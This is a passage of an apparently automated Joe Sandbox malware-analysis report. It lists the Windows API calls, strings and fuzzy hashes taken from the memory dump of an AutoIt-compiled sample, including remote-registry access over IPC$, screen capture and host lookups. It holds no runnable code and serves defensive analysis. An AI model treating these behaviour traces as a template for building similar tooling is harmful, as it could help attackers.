                                                              • GetFileAttributesW.KERNEL32(?), ref: 0049DA7B
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0049DA95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DAA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: 3840be858e9b721e71c8f95fb15e2032d682e63d3e6dfd021b8c1ccc694b39a3
                                                              • Instruction ID: 4b67461f1d7fac1195f09accd9e0c49c277a3fd710b0d332433846a9f6104a9b
                                                              • Opcode Fuzzy Hash: 3840be858e9b721e71c8f95fb15e2032d682e63d3e6dfd021b8c1ccc694b39a3
                                                              • Instruction Fuzzy Hash: 888180B19042419FCF24EF65C844A6BBBE4AF89314F14483FF889DB251E638ED45CB5A
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004BC1FC
                                                              • GetFocus.USER32 ref: 004BC20C
                                                              • GetDlgCtrlID.USER32(00000000), ref: 004BC217
                                                              • _memset.LIBCMT ref: 004BC342
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004BC36D
                                                              • GetMenuItemCount.USER32(?), ref: 004BC38D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 004BC3A0
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004BC3D4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004BC41C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004BC454
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004BC489
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: 40b655913d8db53b5aec221a33c96b2900b649b018ce5a77658baab63b53b81a
                                                              • Instruction ID: 44b227534b984fe46bd71ad8088ef5e669019ad1380c54da2e5c736fb4e79d23
                                                              • Opcode Fuzzy Hash: 40b655913d8db53b5aec221a33c96b2900b649b018ce5a77658baab63b53b81a
                                                              • Instruction Fuzzy Hash: 44816C70608301AFD714DF14C8D4AABBBE4EB88714F00492FFA9597291D778D905CBAA
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004A738F
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004A739B
                                                              • CreateCompatibleDC.GDI32(?), ref: 004A73A7
                                                              • SelectObject.GDI32(00000000,?), ref: 004A73B4
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004A7408
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 004A7444
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004A7468
                                                              • SelectObject.GDI32(00000006,?), ref: 004A7470
                                                              • DeleteObject.GDI32(?), ref: 004A7479
                                                              • DeleteDC.GDI32(00000006), ref: 004A7480
                                                              • ReleaseDC.USER32(00000000,?), ref: 004A748B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: aa038baa817eb93dd7d4912401168c92a61f75d303337d4ad467928d58513b6c
                                                              • Instruction ID: 9564fca4adc6d706f3a4d0af48cda8b7be437c398fb12a3ae8afcea99d9aab50
                                                              • Opcode Fuzzy Hash: aa038baa817eb93dd7d4912401168c92a61f75d303337d4ad467928d58513b6c
                                                              • Instruction Fuzzy Hash: A5515875904209EFCB24CFA8CC84EAFBBB9EF49310F14852EF95997221C735A845CB54
                                                              APIs
                                                                • Part of subcall function 00450957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00436B0C,?,00008000), ref: 00450973
                                                                • Part of subcall function 00434750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00434743,?,?,004337AE,?), ref: 00434770
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00436BAD
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00436CFA
                                                                • Part of subcall function 0043586D: _wcscpy.LIBCMT ref: 004358A5
                                                                • Part of subcall function 0045363D: _iswctype.LIBCMT ref: 00453645
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 537147316-1018226102
                                                              • Opcode ID: 5c41172028cf3d871fbc6184111276798deba7bfc23bf5e02e8f8d2435126951
                                                              • Instruction ID: 3e2d1a7d025324bd6ba8941fd8a84b760951e72e4ab90c6e1ffcb07a29f3e56c
                                                              • Opcode Fuzzy Hash: 5c41172028cf3d871fbc6184111276798deba7bfc23bf5e02e8f8d2435126951
                                                              • Instruction Fuzzy Hash: 3D02AF741083419FC724EF26C8819AFBBE5AF98318F10491FF485972A1DB38D949CB5B
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492D50
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00492DDD
                                                              • GetMenuItemCount.USER32(004F5890), ref: 00492E66
                                                              • DeleteMenu.USER32(004F5890,00000005,00000000,000000F5,?,?), ref: 00492EF6
                                                              • DeleteMenu.USER32(004F5890,00000004,00000000), ref: 00492EFE
                                                              • DeleteMenu.USER32(004F5890,00000006,00000000), ref: 00492F06
                                                              • DeleteMenu.USER32(004F5890,00000003,00000000), ref: 00492F0E
                                                              • GetMenuItemCount.USER32(004F5890), ref: 00492F16
                                                              • SetMenuItemInfoW.USER32(004F5890,00000004,00000000,00000030), ref: 00492F4C
                                                              • GetCursorPos.USER32(?), ref: 00492F56
                                                              • SetForegroundWindow.USER32(00000000), ref: 00492F5F
                                                              • TrackPopupMenuEx.USER32(004F5890,00000000,?,00000000,00000000,00000000), ref: 00492F72
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00492F7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: def8f307c36392f70dbaae0a8e6c729584f1499c8b5c7309b1fc26b85c0b5e30
                                                              • Instruction ID: 723434facf599a0d59b87035b3182a11987e658f6349be3816acea515734af49
                                                              • Opcode Fuzzy Hash: def8f307c36392f70dbaae0a8e6c729584f1499c8b5c7309b1fc26b85c0b5e30
                                                              • Instruction Fuzzy Hash: 0E71D270640205BBEF219F55DD85FAABF64FB04324F100237F619A62E1C7F96824DB99
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 004A88D7
                                                              • CoInitialize.OLE32(00000000), ref: 004A8904
                                                              • CoUninitialize.OLE32 ref: 004A890E
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 004A8A0E
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 004A8B3B
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,004C2C0C), ref: 004A8B6F
                                                              • CoGetObject.OLE32(?,00000000,004C2C0C,?), ref: 004A8B92
                                                              • SetErrorMode.KERNEL32(00000000), ref: 004A8BA5
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004A8C25
                                                              • VariantClear.OLEAUT32(?), ref: 004A8C35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID: ,,L
                                                              • API String ID: 2395222682-2286747779
                                                              • Opcode ID: 33fd3316faaa3e1e026b07633174f26bd70b5b57b9cefad690e8560809898d64
                                                              • Instruction ID: 8ddb8eb93558f2b1eb38f1fb0cc6c0126b17f7be908824cd0f1f82e32da4afcc
                                                              • Opcode Fuzzy Hash: 33fd3316faaa3e1e026b07633174f26bd70b5b57b9cefad690e8560809898d64
                                                              • Instruction Fuzzy Hash: 31C159B1604305AFD700EF69C88492BB7E9FF89348F00492EF8899B251DB75ED06CB56
                                                              APIs
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • _memset.LIBCMT ref: 0048786B
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004878A0
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004878BC
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004878D8
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00487902
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0048792A
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00487935
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0048793A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1411258926-22481851
                                                              • Opcode ID: 936e9f980f97b6eb3157bde3515116a7ba79be5e9b0ce221c4f74ee5bc9f72d8
                                                              • Instruction ID: f85230890a134429dada4fd1f803fe06b5a475c2f3d057ee0abcfb2bddb49935
                                                              • Opcode Fuzzy Hash: 936e9f980f97b6eb3157bde3515116a7ba79be5e9b0ce221c4f74ee5bc9f72d8
                                                              • Instruction Fuzzy Hash: BD411CB2C14229ABDF21EFA5DC95DEEB778BF08314F00552AF805A3261DB389D04CB94
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: 6a60fbb1e7d73f22319137d5a5561f2ef5df4a04efe7c18cc5cd5da80cb3733a
                                                              • Instruction ID: b0c8838b39500910429bac7da14d8ce978a8c4a296f69f762a7d58b980cee562
                                                              • Opcode Fuzzy Hash: 6a60fbb1e7d73f22319137d5a5561f2ef5df4a04efe7c18cc5cd5da80cb3733a
                                                              • Instruction Fuzzy Hash: 5C41387520424A8BCF20EF12D855AFF3760AF2530AF14445AFC551B292DB7C9D1ACBA8
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0046E2A0,00000010,?,Bad directive syntax error,004BF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0048F7C2
                                                              • LoadStringW.USER32(00000000,?,0046E2A0,00000010), ref: 0048F7C9
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • _wprintf.LIBCMT ref: 0048F7FC
                                                              • __swprintf.LIBCMT ref: 0048F81E
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0048F88D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1506413516-4153970271
                                                              • Opcode ID: 35c52806403f3bef034c2b6f0d1d95cf7efc62e330108b8406974834e800e7b2
                                                              • Instruction ID: a6df5ee64d5daf32af2fe6e6629bc9dc25dc20675bad8bb3b85ac66f79511aa0
                                                              • Opcode Fuzzy Hash: 35c52806403f3bef034c2b6f0d1d95cf7efc62e330108b8406974834e800e7b2
                                                              • Instruction Fuzzy Hash: CA216172910219EBCF12EF91CC4AEEE7739BF18315F04086FB509660A2DA399618DB59
                                                              APIs
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                                • Part of subcall function 00437924: _memmove.LIBCMT ref: 004379AD
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00495330
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00495346
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00495357
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00495369
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0049537A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: SendString$_memmove
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 2279737902-1007645807
                                                              • Opcode ID: 7c6dfc13fb0ee9333cd4b9e87a2ec3c014619453dd71bad3be3007eb865fab00
                                                              • Instruction ID: 22cbe2b56277fbd40800c485d26c42913dcaad1d88cefed8a2fe673d43c43e7a
                                                              • Opcode Fuzzy Hash: 7c6dfc13fb0ee9333cd4b9e87a2ec3c014619453dd71bad3be3007eb865fab00
                                                              • Instruction Fuzzy Hash: 6C11936095015979DB30B673CC4AEFF7B7CEBD5B44F20042FB805920D1DEA80D44C668
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 208665112-3771769585
                                                              • Opcode ID: 76b03419e5c1852884c4d80d708f2ab9b10b7f40cedf6d54000b99f5386c25c7
                                                              • Instruction ID: 63f9e1216dddc9093f5ba13a4df3f9a0fd642798378b76ed77554181cc885c8b
                                                              • Opcode Fuzzy Hash: 76b03419e5c1852884c4d80d708f2ab9b10b7f40cedf6d54000b99f5386c25c7
                                                              • Instruction Fuzzy Hash: 5D1108315001086BCF10AB71DC46EDA7BBCDB86716F1002FBF84996152EF788A8A8A58
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00494F7A
                                                                • Part of subcall function 0045049F: timeGetTime.WINMM(?,7694B400,00440E7B), ref: 004504A3
                                                              • Sleep.KERNEL32(0000000A), ref: 00494FA6
                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00494FCA
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00494FEC
                                                              • SetActiveWindow.USER32 ref: 0049500B
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00495019
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00495038
                                                              • Sleep.KERNEL32(000000FA), ref: 00495043
                                                              • IsWindow.USER32 ref: 0049504F
                                                              • EndDialog.USER32(00000000), ref: 00495060
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 01fe271423366aa7219fee6b9116fa53b20dfe68c26053080f85e615f6f1d0dc
                                                              • Instruction ID: 747e1e6ebf0c57fd439715426f5a93b8a552347d75339226df7a7ca21dd1ac15
                                                              • Opcode Fuzzy Hash: 01fe271423366aa7219fee6b9116fa53b20dfe68c26053080f85e615f6f1d0dc
                                                              • Instruction Fuzzy Hash: 4221CF70205601BFEB215F20FC89E363F69EB45349B15223AF509922B5CB258D25CB6E
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • CoInitialize.OLE32(00000000), ref: 0049D5EA
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0049D67D
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0049D691
                                                              • CoCreateInstance.OLE32(004C2D7C,00000000,00000001,004E8C1C,?), ref: 0049D6DD
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0049D74C
                                                              • CoTaskMemFree.OLE32(?,?), ref: 0049D7A4
                                                              • _memset.LIBCMT ref: 0049D7E1
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0049D81D
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0049D840
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0049D847
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0049D87E
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0049D880
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 059da28ea00100a5140b4159ecd9696d45c3c1d5296d70ce8d0135d1d8ba9c6c
                                                              • Instruction ID: c50fce7bf9d91325d01810b9ae43b9651b7c82db9270897ed81526a731190bdb
                                                              • Opcode Fuzzy Hash: 059da28ea00100a5140b4159ecd9696d45c3c1d5296d70ce8d0135d1d8ba9c6c
                                                              • Instruction Fuzzy Hash: 73B11C75A00109AFDB04DFA5C884DAEBBB9FF48304F1485AAF909EB261DB34ED45CB54
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0048C283
                                                              • GetWindowRect.USER32(00000000,?), ref: 0048C295
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0048C2F3
                                                              • GetDlgItem.USER32(?,00000002), ref: 0048C2FE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0048C310
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0048C364
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0048C372
                                                              • GetWindowRect.USER32(00000000,?), ref: 0048C383
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0048C3C6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0048C3D4
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0048C3F1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0048C3FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
